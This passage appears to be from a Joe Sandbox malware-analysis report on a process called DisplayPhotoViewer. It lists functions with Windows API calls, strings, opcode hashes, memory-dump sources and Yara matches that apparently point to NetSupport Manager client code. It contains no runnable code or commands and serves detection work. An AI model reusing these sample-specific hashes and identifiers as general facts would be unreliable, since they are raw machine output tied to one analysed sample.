                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                    • API String ID: 3784150691-4022980321
                                                                                                    • Opcode ID: 8a177b86c9c12458968d0aaddaf78867e311fc7eefc336ff7107c80ba94edd50
                                                                                                    • Instruction ID: 6976064b5a27e4ea24572c67b07b4eb5d400cde5ba2d78dfb3fbb54c2e0be66b
                                                                                                    • Opcode Fuzzy Hash: 8a177b86c9c12458968d0aaddaf78867e311fc7eefc336ff7107c80ba94edd50
                                                                                                    • Instruction Fuzzy Hash: 233196B2A0021DEEDB11DB60DC89FDA73EDEB46350F140756F585D60C4EA70EA94CA91
                                                                                                    Function 110FD7E0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD811
                                                                                                    • EnterCriticalSection.KERNEL32 ref: 110FD828
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD82E
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD8CB
                                                                                                    • LeaveCriticalSection.KERNEL32(111E41A4), ref: 110FD8D8
                                                                                                    Strings
                                                                                                    • Warning. simap lock held for %d ms, xrefs: 110FD8E9
                                                                                                    • Warning. took %d ms to get simap lock, xrefs: 110FD83F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$CriticalSection$EnterLeave
                                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                    • API String ID: 956672424-625438208
                                                                                                    • Opcode ID: e26f774285a4bfa5a56468c6f482af273d324fe941443d30310a8240df9aba89
                                                                                                    • Instruction ID: afa8af104bf30b52f31402b86174fc9a0c93113008257d45ec293f1d4e5a4225
                                                                                                    • Opcode Fuzzy Hash: e26f774285a4bfa5a56468c6f482af273d324fe941443d30310a8240df9aba89
                                                                                                    • Instruction Fuzzy Hash: E931C375E14252AFE712CFA5D889F5EBBE4EB05318F0501A9E825EB391D730EC01CBA0
                                                                                                    Function 110C9960 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _memmove.LIBCMT ref: 110C9A48
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                    • String ID: ..\CTL32\NSMString.cpp$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$iAt+nUnits<=Length()$iAt>=0 && iAt<Length()$nUnits>=0
                                                                                                    • API String ID: 1528188558-1174737702
                                                                                                    • Opcode ID: 8c0902955d520c8cf1bbe960f8517294601259b3818032bffdfadcfc7d6abcad
                                                                                                    • Instruction ID: f42b3eb6903577d64847f36363cae9fc279dbf186a4d140b8ba71a5404cd53f2
                                                                                                    • Opcode Fuzzy Hash: 8c0902955d520c8cf1bbe960f8517294601259b3818032bffdfadcfc7d6abcad
                                                                                                    • Instruction Fuzzy Hash: F721F73CB00A177BDB10DE69EC91FDEB3919FE4A08F418068E95927341FA22B9044AD5
                                                                                                    Function 110211F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetDlgItemTextA.USER32(?,?,11189200), ref: 11021266
                                                                                                    • GetDlgItem.USER32(?,?), ref: 1102127A
                                                                                                    • SetFocus.USER32(00000000), ref: 1102127D
                                                                                                    • GetDlgItem.USER32(?,?), ref: 110212A8
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 110212AD
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11021296
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h, xrefs: 11021291
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Item$EnableFocusTextWindow
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h$m_hWnd
                                                                                                    • API String ID: 467963834-3304639117
                                                                                                    • Opcode ID: 86a93ed789c0327e3d92eda4b861f5be3429d2ec34d18eb0fd2e3decca17516d
                                                                                                    • Instruction ID: 3cf81791dc8affa6a22c240d28b513f8263695040da33d3af3a9d10dad5f9260
                                                                                                    • Opcode Fuzzy Hash: 86a93ed789c0327e3d92eda4b861f5be3429d2ec34d18eb0fd2e3decca17516d
                                                                                                    • Instruction Fuzzy Hash: 202157B6A00614AFE710DB59DC84FABF7EAFB49714F408929F91697780C774A900CBA0
                                                                                                    Function 1113D640 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74keyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,1102CD68,?), ref: 1113D65D
                                                                                                    • wsprintfA.USER32 ref: 1113D67B
                                                                                                    • OutputDebugStringA.KERNEL32(?,?,1102CD68,?), ref: 1113D691
                                                                                                      • Part of subcall function 1113A150: GetTickCount.KERNEL32 ref: 1113A1B8
                                                                                                      • Part of subcall function 1113D2F0: GetCurrentThreadId.KERNEL32 ref: 1113D303
                                                                                                      • Part of subcall function 1113D2F0: wsprintfA.USER32 ref: 1113D383
                                                                                                      • Part of subcall function 1113D2F0: IsBadReadPtr.KERNEL32(?,00000001), ref: 1113D3A8
                                                                                                      • Part of subcall function 1113D2F0: wsprintfA.USER32 ref: 1113D3C8
                                                                                                      • Part of subcall function 1113D2F0: wsprintfA.USER32 ref: 1113D3E5
                                                                                                    • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,1102CD68,?), ref: 1113D6D6
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,1102CD68,?), ref: 1113D6D9
                                                                                                      • Part of subcall function 110B2610: GetLastError.KERNEL32(1110784B,11189A50,?,?,11028061,?,11189A50,1110784B,00000000), ref: 110B263C
                                                                                                      • Part of subcall function 110B2610: _strrchr.LIBCMT ref: 110B264B
                                                                                                      • Part of subcall function 110B2610: _strrchr.LIBCMT ref: 110B266D
                                                                                                      • Part of subcall function 110B2610: GetTickCount.KERNEL32 ref: 110B269D
                                                                                                      • Part of subcall function 110B2610: GetTickCount.KERNEL32 ref: 110B26C8
                                                                                                      • Part of subcall function 110B2610: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110B26EC
                                                                                                      • Part of subcall function 110B2610: TranslateMessage.USER32(?), ref: 110B26F5
                                                                                                      • Part of subcall function 110B2610: DispatchMessageA.USER32(?), ref: 110B26FE
                                                                                                    • GetKeyState.USER32(00000011), ref: 1113D6F9
                                                                                                    Strings
                                                                                                    • Exception caught at %x. Trying minidump., xrefs: 1113D675
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$CountErrorLastMessageTick$DebugOutputString_strrchr$CurrentDispatchReadStateThreadTranslate
                                                                                                    • String ID: Exception caught at %x. Trying minidump.
                                                                                                    • API String ID: 490122820-543155386
                                                                                                    • Opcode ID: 1882ac8880a0e9807ad161a58648f16f4a893b8a3610cf607d3973b7ca3830fb
                                                                                                    • Instruction ID: 0f8bdfc1f4b97e07f61b132875ea6d081ea0208f0ba83897f92bacd8fe6032dd
                                                                                                    • Opcode Fuzzy Hash: 1882ac8880a0e9807ad161a58648f16f4a893b8a3610cf607d3973b7ca3830fb
                                                                                                    • Instruction Fuzzy Hash: 9F21F579D002189FDB15DB64DDC5FDDB3B8EB5C309F4044A4EA1997284EBB0AA84CBA1
                                                                                                    Function 110FD700 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD71F
                                                                                                    • EnterCriticalSection.KERNEL32(111E41A4), ref: 110FD728
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD72E
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD7AF
                                                                                                    • LeaveCriticalSection.KERNEL32(111E41A4), ref: 110FD7B8
                                                                                                    Strings
                                                                                                    • Warning. simap lock held for %d ms, xrefs: 110FD7CB
                                                                                                    • Warning. took %d ms to get simap lock, xrefs: 110FD73A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$CriticalSection$EnterLeave
                                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                    • API String ID: 956672424-625438208
                                                                                                    • Opcode ID: f482a6b72132e1b5a2ed344e50b762a101e80b5cc96b873eaba95eb37c39ef62
                                                                                                    • Instruction ID: cb6112516052c2a5b18be13c81cc04c2416d8f5290511f5e631eb46653ffda6e
                                                                                                    • Opcode Fuzzy Hash: f482a6b72132e1b5a2ed344e50b762a101e80b5cc96b873eaba95eb37c39ef62
                                                                                                    • Instruction Fuzzy Hash: E7217C68E002D25FE706DFA5D889F6DBAE2AB81319F1540A9D0218F665E625D880C750
                                                                                                    Function 11087820 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(00000000,00000000), ref: 11087854
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 11087873
                                                                                                    • OpenProcess.KERNEL32(00000440,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,110FFC55,?,00000001,00000000,00000000), ref: 11087889
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessWindow$FindOpenThread
                                                                                                    • String ID: Error. NULL hToken$Progman
                                                                                                    • API String ID: 3432422346-976623215
                                                                                                    • Opcode ID: 31a999eaa275b481e36162bc96484caf47695d0b5085a7a89d93a6f7d445774d
                                                                                                    • Instruction ID: 577cb43ffac78de60545b3a1b6dce0e5cc064d5140e97e09a6559e89939d64d1
                                                                                                    • Opcode Fuzzy Hash: 31a999eaa275b481e36162bc96484caf47695d0b5085a7a89d93a6f7d445774d
                                                                                                    • Instruction Fuzzy Hash: 50118671E115289BCB51DFA4D885BEEF7F8EF4C718F104169ED15A7244EB30A900C7A5
                                                                                                    Function 110B3340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 110B3386
                                                                                                    • GetFileVersionInfoSizeA.VERSION(?,?), ref: 110B339C
                                                                                                    • _malloc.LIBCMT ref: 110B33A7
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                    • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 110B33C1
                                                                                                    • VerQueryValueA.VERSION(00000000,1118E364,?,?,?,?,00000000,00000000,?), ref: 110B33DA
                                                                                                    • _free.LIBCMT ref: 110B33EA
                                                                                                      • Part of subcall function 11158445: HeapFree.KERNEL32(00000000,00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115845B
                                                                                                      • Part of subcall function 11158445: GetLastError.KERNEL32(00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115846D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileHeapInfoVersion$AllocateErrorFreeLastQuerySizeValue_free_malloc_memset
                                                                                                    • String ID: shdocvw.dll
                                                                                                    • API String ID: 2585106851-1755026807
                                                                                                    • Opcode ID: 4519c9cbc35da6a2524259d6dbf986fedabafc75943b821104ed265bf93a3951
                                                                                                    • Instruction ID: 69b19f5c92fab129c46dba1ead543c4f90c76f6ec4451b795a7cee44f019feac
                                                                                                    • Opcode Fuzzy Hash: 4519c9cbc35da6a2524259d6dbf986fedabafc75943b821104ed265bf93a3951
                                                                                                    • Instruction Fuzzy Hash: 2D1166B6D041299BCBA4CB65DC81EDEF778EB45308F0041A9D95957244EA706B84CF91
                                                                                                    Function 1103D820 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(00000000), ref: 1103D836
                                                                                                    • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D84C
                                                                                                    • IsWindow.USER32(00000000), ref: 1103D854
                                                                                                    • Sleep.KERNEL32(00000014), ref: 1103D867
                                                                                                    • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D877
                                                                                                    • IsWindow.USER32(00000000), ref: 1103D87F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Find$Sleep
                                                                                                    • String ID: PCIVideoSlave32
                                                                                                    • API String ID: 2137649973-2496367574
                                                                                                    • Opcode ID: 9454313089c810d930400881290c14aa3e1bf766efc57f8decebde6de58778c8
                                                                                                    • Instruction ID: 1a8355d6b670377a2bfb881dfdae89cbe9e1308f6cfd124a674b34c064d9d0c2
                                                                                                    • Opcode Fuzzy Hash: 9454313089c810d930400881290c14aa3e1bf766efc57f8decebde6de58778c8
                                                                                                    • Instruction Fuzzy Hash: 2CF01D72A022296ED712EBE99C84F9AF7D8AB84AA5F814074E918D7548D730E8008775
                                                                                                    Function 11003330 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000,00002EFF), ref: 1100333E
                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 1100336A
                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 1100338C
                                                                                                    • DestroyMenu.USER32(00000000), ref: 1100339A
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                    • API String ID: 468487828-934300333
                                                                                                    • Opcode ID: 38e803ffbc9ed5d16397c6f3bf807990cbac9101e75636f18d90fbdb22d2249a
                                                                                                    • Instruction ID: f90a26523252d68c6535ff68c229b9c2d9a456ce1f5051f6a0844e9fc6656983
                                                                                                    • Opcode Fuzzy Hash: 38e803ffbc9ed5d16397c6f3bf807990cbac9101e75636f18d90fbdb22d2249a
                                                                                                    • Instruction Fuzzy Hash: 8EF0E96AF80626B6D21352A96C85F8FF758CBD15A9F418070F904B6280FA50A80002E6
                                                                                                    Function 11003240 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000,00002EF9), ref: 1100324D
